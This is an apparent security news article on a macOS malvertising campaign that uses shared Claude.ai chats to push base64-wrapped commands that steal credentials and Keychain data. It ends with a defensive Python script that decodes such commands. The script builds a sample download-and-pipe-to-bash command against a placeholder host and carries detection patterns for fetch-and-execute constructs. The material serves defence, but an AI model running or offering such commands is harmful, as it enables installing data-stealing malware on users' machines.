Did you search for 'Claude mac download'? You might have clicked on an ad that installs malware
A New Malvertising Campaign Targeting macOS
A new, active malvertising campaign is abusing Google Ads and the chat-sharing feature of Claude.ai to distribute malware on macOS. It was uncovered by Berk Albayrak, a security engineer at Trendyol Group, who published his findings on LinkedIn. What sets this campaign apart from classic malvertising operations, and makes it particularly insidious, is that the sponsored ads point to Anthropic's real domain, claude.ai, rather than to a look-alike site: the malicious lure is hosted directly on the legitimate platform.
The Attack Chain
Users searching for "Claude mac download" on Google may see a sponsored ad that correctly lists claude.ai as its destination. Clicking it does not lead to the official Anthropic download page, however; it lands on a public shared chat that poses as an official installation guide for "Claude Code on Mac", attributed to Apple Support. This is a notable technical shift from the similar campaigns of February-March 2026, which abused Claude artifacts, the standalone outputs the platform generates. The chat instructs the user to open the Terminal and paste a base64-encoded command that silently downloads and executes a malware loader.
While attempting to verify Albayrak's report, researchers at BleepingComputer stumbled upon a second malicious chat with a different domain and payload but an identical structure and social-engineering approach. The payload identified by BleepingComputer is a gzip-compressed shell script that is decompressed and executed entirely in memory, leaving no obvious traces on disk.
Polymorphic Payload and Selective Targeting
The technical behavior of the loader identified by BleepingComputer reveals a non-trivial level of operational sophistication. The server uses so-called polymorphic delivery: every request receives a copy of the payload with unique obfuscation, so the hash- and signature-based checks that many security tools rely on as a first line of defense never see the same sample twice. Before proceeding to the next phase, the loader enumerates the keyboard input sources configured on the system. If it finds Russian layouts or those of other CIS countries, the malware terminates itself, sending a silent ping to the attacker's server with the status cis_blocked. Only machines that pass this geographic filter receive the next stage.
Victim profiling does not stop there. The script collects the external IP address, hostname, macOS version, and keyboard locale and sends them to the server before continuing. This selection phase suggests that the operators are after specific targets rather than blanket distribution of the malware. In the second phase, the next-stage payload is fetched and executed through osascript, macOS's native scripting runner, which gives the operators remote code execution without ever writing a conventional application or binary to disk.
Two Variants, Two Behaviors
The two intercepted variants differ in their post-infection behavior. The variant discovered by Albayrak skips the profiling stage and goes straight to data exfiltration; he identified it as MacSync. The variant identified by BleepingComputer performs full profiling first and has not been explicitly attributed to MacSync: the two are technically related but follow partially different operational flows. What links them is the exfiltration of browser credentials, session cookies, and the contents of the macOS Keychain, along with any crypto wallets present on the system. The data is packaged and sent to the C2 server via HTTP POST, with the traffic disguised under a legitimate-looking macOS user agent.
An Expanding Pattern
This is not the first time AI platforms have been weaponized this way. In December 2025, similar campaigns emerged that abused shared chats from ChatGPT and Grok to distribute the AMOS info-stealer. The February-March 2026 campaigns used Claude artifacts instead, with a single malicious artifact recording over 15,600 views before it was removed. The current campaign is a natural evolution: artifacts, which are easier to monitor, have been abandoned in favor of shared chats, which offer a richer and more convincing narrative context for social engineering. According to an analysis published by Pillar Security in March 2026, at least 20 distinct malware campaigns targeting AI and vibe-coding tools were documented between February 2025 and March 2026, with macOS disproportionately targeted relative to its market share.
The abuse mechanism exploits a structural characteristic of these platforms: user-generated, publicly accessible content is hosted on the same domain as the official application. There is therefore no fake domain to spot in the ad's URL, and Google's anti-malvertising filters cannot distinguish a malicious chat from a legitimate one when the destination is the real service's domain. The practical recommendation is to visit official sites directly when downloading a native app, to avoid clicking sponsored results for AI tools, and to treat with strong suspicion any instructions that ask you to paste commands into the Terminal, regardless of the apparent source. A legitimate installation guide has no reason to hide its command behind base64 encoding; if you are ever tempted to run one, decode it first and read what it actually does.
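The following Python script is an added example, not code from the article or from either researcher. It implements the check implied by the attack-chain description and by the closing advice above: before anything runs, peel every base64 and gzip layer of a "paste this into Terminal" command offline and flag fetch-and-pipe-to-interpreter constructs. The embedded sample command is constructed for the demonstration (the host cdn.example.invalid is a placeholder) and is not the campaign's real payload; only its shape, base64 wrapping a gzip-compressed shell script that pipes into bash, mirrors the chain the article describes.

```python
"""Triage a command that a web page asks you to paste into Terminal.

Added example for this article. Decodes base64 and gzip layers offline and
flags download-and-execute constructs. The sample command at the bottom is
constructed and is NOT the campaign's real payload.
"""
import base64
import binascii
import gzip
import re

# A run of base64-alphabet characters long enough to hide a command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Constructs worth flagging once every layer is visible.
FETCHERS = re.compile(r"\b(?:curl|wget|nscurl)\b")
DECODERS = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b|\bgunzip\b|\bgzip\s+-d\b|\bzcat\b")
PIPE_TO_INTERPRETER = re.compile(
    r"\|\s*(?:sudo\s+)?(?:bash|sh|zsh|ksh|python3?|perl|ruby|osascript)\b"
)
GZIP_MAGIC = b"\x1f\x8b"


def _as_text(raw: bytes):
    """Return raw as str if it looks like script text, otherwise None."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None


def decode_blob(blob: str):
    """Base64-decode one blob, transparently gunzipping if the result is gzip."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None
    if raw.startswith(GZIP_MAGIC):
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):
            return None
    return _as_text(raw)


def peel(command: str, max_depth: int = 5):
    """Return [command, layer1, layer2, ...], decoding every embedded blob per layer."""
    layers = [command]
    current = command
    for _ in range(max_depth):
        decoded = [t for t in (decode_blob(b) for b in B64_BLOB.findall(current)) if t]
        if not decoded:
            break
        current = "\n".join(decoded)
        layers.append(current)
    return layers


def assess(command: str):
    """Peel the command and rate it LOW / MEDIUM / HIGH from what becomes visible."""
    layers = peel(command)
    visible = "\n".join(layers)
    findings = []
    if len(layers) > 1:
        findings.append(f"{len(layers) - 1} hidden encoded/compressed layer(s)")
    if DECODERS.search(visible):
        findings.append("decodes or decompresses content at runtime")
    if FETCHERS.search(visible):
        findings.append("fetches content from the network")
    if PIPE_TO_INTERPRETER.search(visible):
        findings.append("pipes data straight into an interpreter")
    if len(findings) >= 3:
        verdict = "HIGH"
    elif findings:
        verdict = "MEDIUM"
    else:
        verdict = "LOW"
    return {"verdict": verdict, "findings": findings, "layers": layers}


# Constructed sample (not the real payload): a one-line fetch-and-run script,
# gzip-compressed and hidden behind base64, as a lure would present it.
SAMPLE_INNER = "curl -fsSL https://cdn.example.invalid/stage2 | bash\n"
SAMPLE_COMMAND = (
    "echo "
    + base64.b64encode(gzip.compress(SAMPLE_INNER.encode())).decode()
    + " | base64 -d | gunzip | bash"
)

if __name__ == "__main__":
    report = assess(SAMPLE_COMMAND)
    print("verdict:", report["verdict"])
    for finding in report["findings"]:
        print(" -", finding)
    for depth, layer in enumerate(report["layers"]):
        print(f"--- layer {depth} ---\n{layer.rstrip()}")
```

A plain `curl ... | bash` with nothing hidden scores MEDIUM, which is deliberate: the article's advice is to distrust pipe-to-shell instructions in general, and the extra layer of encoding or compression is what pushes a command into HIGH. Extend the regexes for other interpreters or decoders you care about; the peeling loop is independent of them.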